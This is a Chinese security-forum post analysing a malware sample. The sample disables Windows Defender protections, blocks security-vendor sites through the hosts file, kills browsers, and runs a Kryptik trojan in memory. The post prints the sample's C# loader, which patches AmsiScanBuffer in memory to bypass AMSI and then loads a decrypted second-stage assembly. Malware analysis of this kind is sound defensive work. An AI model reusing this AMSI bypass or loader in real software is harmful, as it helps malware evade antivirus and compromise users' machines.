本帖最后由 图钉鱼 于 2025-7-7 16:26 编辑
添加Windows Defender排除项,下载同伙运行,
修改系统 hosts 文件,屏蔽 100+ 个安全厂商域名/IP,
强制关闭主流浏览器进程(阻止用户浏览器求助或访问安全网站下载杀毒),
解密运行一个内存马~禁用AMSI功能后从脚本解析出一个Kryptik木马运行,除火绒外基本都可以查杀这个木马VirusTotal - File - ef30059583a58856fe4bfee6476e0ad6402462bd10c6bb27eda202fc9cc27e92
这个马又会下载另一个木马,套娃样本报告-微步在线云沙箱,新样本可以新开一贴了
内存马代码如下:
- public class Loader
- {
- [DllImport("kernel32.dll")]
- private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
-
- [DllImport("kernel32.dll")]
- private static extern IntPtr LoadLibrary(string dllName);
-
- public static void Main()
- {
-
- IntPtr hMod = LoadLibrary("amsi.dll");
- IntPtr asbAddr = GetProcAddress(hMod, "AmsiScanBuffer");
-
- // AMSI内存禁用
- PatchMemory(asbAddr, new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 });
-
- // 从资源加载load(在脚本最后的编码中)
- byte[] stage2 = ExtractResource("encrypted.bin");
- Assembly.Load(Decrypt(stage2)).EntryPoint.Invoke(null, null);
- }
-
- private static void PatchMemory(IntPtr address, byte[] patch)
- {
-
- VirtualProtect(address, (uint)patch.Length,
- 0x40 /* PAGE_EXECUTE_READWRITE */, out uint oldProtect);
-
- // 写入
- Marshal.Copy(patch, 0, address, patch.Length);
-
-
- VirtualProtect(address, (uint)patch.Length, oldProtect, out _);
- }
- }
|
楼主: xiaozhu009
发表于 2025-7-7 14:36:02
